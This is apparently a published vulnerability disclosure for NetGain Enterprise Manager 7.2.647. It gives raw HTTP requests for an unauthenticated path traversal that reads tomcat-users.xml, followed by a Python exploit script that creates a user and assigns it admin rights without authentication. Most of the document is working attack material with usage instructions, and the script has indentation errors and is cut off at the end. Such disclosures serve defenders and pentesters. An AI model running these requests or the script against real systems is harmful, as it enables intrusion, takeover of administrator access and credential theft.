NetGain Enterprise Manager: Authentication Bypass / Local File Inclusion

NetGain Enterprise Manager: Authentication Bypass / Local File Inclusion

We discovered a vulnerability on NetGain Enterprise Manager (ver. 7.2.647) during a pentest. We believe that this vulnerability is quite rare and worth to share.

Local File Inclusion
Normal Request:

POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
 
filename=iossd.log

We can download another file with change the value on filename parameter and we can send this request without login.

Example:

POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
 
filename=../../tomcat/conf/tomcat-users.xml

Add User Account with Admin Privilege without Login
This application does not check the session on this request below, thus we can add user and assign admin privilege to it without authentication.

#!/usr/local/bin/python
# Exploit Title: Add User Account with Admin Privilege without Login
# Date: 2017-05-21
# Exploit Author: f3ci
# Vendor Homepage: http://www.netgain-systems.com
# Software Link: http://www.netgain-systems.com/free-edition-download/
# Version: <= v7.2.647 build 941
# Tested on: Windows 7
  
import requests
import sys
  
try:
 def create():
    ip = str(sys.argv[1])
    port = str(sys.argv[2])
    user = str(sys.argv[3])
    passwd = str(sys.argv[4])
  
    print "\033[1;32m[+]\033[1;m Try to Create user"
    url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
    data= {
        'new': "true", 
        'id': "", 
        'name': user, 
        'dname': "foobar", 
        'password': passwd, 
        'password2': passwd, 
        'description': "", 
        'emails': "[email protected]", 
        'mobileNumber': "000000", 
        'loginAttempts': "5",
        }
    response = requests.post(url, data=data)
    status = response.status_code
    if status == 200:
        print "\033[1;32m[+]\033[1;m Success!!"
        role()
    else:
        print "\033[91m[-]\033[91;m Create User Failed"
  
  
 def role():
    ip = str(sys.argv[1])
        port = str(sys.argv[2])
    user = str(sys.argv[3])
        passwd = str(sys.argv[4])
  
    print "\033[1;32m[+]\033[1;m Get admin role"
    url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
    data= {
        'name': "admin", 
        'description': "Administrator", 
        'users': [user,"admin"],
        }
    response = requests.post(url, data=data)
    status = response.status_code
    if status == 200:
        print "\033[1;32m[+]\033[1;m Success!!"
        print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
    else:
        print "\033[91m[-]\033[91;m Get admin role Failed"
  
 create();
  
except:
    print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0])
    print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081